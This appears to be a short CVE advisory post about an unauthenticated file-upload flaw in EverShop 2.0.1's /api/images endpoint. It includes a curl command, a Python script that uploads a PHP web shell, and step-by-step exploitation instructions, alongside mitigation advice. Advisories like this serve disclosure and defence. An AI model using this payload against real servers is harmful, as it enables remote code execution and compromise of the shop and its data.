Listen to this Post
How the CVE Works:
The vulnerability resides in the `/api/images` endpoint of EverShop version 2.0.1. This API fails to perform any authentication checks, allowing completely unauthenticated users to access its file upload and directory creation functions. The endpoint does not adequately validate or sanitize user-supplied input, such as file names or directory paths. An attacker can send a crafted HTTP POST request containing malicious file data. The server blindly accepts this request, permitting the attacker to upload arbitrary files, including web shells with executable extensions like `.php` or .jsp, directly to the server’s filesystem. Additionally, the flaw allows for the creation of new directories, enabling an attacker to structure paths for their payloads. Successful exploitation grants the attacker the ability to execute arbitrary code on the host server with the same privileges as the EverShop application, leading to full system compromise.
DailyCVE Form:
Platform: EverShop
Version: 2.0.1
Vulnerability: File Upload Exploitation
Severity: Critical
Date: 12/02/2025
Prediction: Patch Expected 12/19/2025
What Undercode Say:
curl -X POST http://<target>/api/images -F "[email protected]"
find /path/to/evershop -name ".php" -newer /tmp/timestamp -ls
import requests
url = "http://target/api/images"
files = {'file': ('backdoor.php', '<?php system($_GET["c"]); ?>')}
r = requests.post(url, files=files)
print(r.text)
How Exploit:
1. Identify target running EverShop 2.0.1.
2. Craft HTTP POST request to `/api/images`.
3. Upload a web shell file.
4. Access the uploaded shell to execute commands.
Protection from this CVE:
1. Apply vendor patch.
2. Implement strict authentication.
3. Validate file types/extensions.
4. Use web application firewall.
Impact:
Remote Code Execution
System Compromise
Data Breach
Service Disruption
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
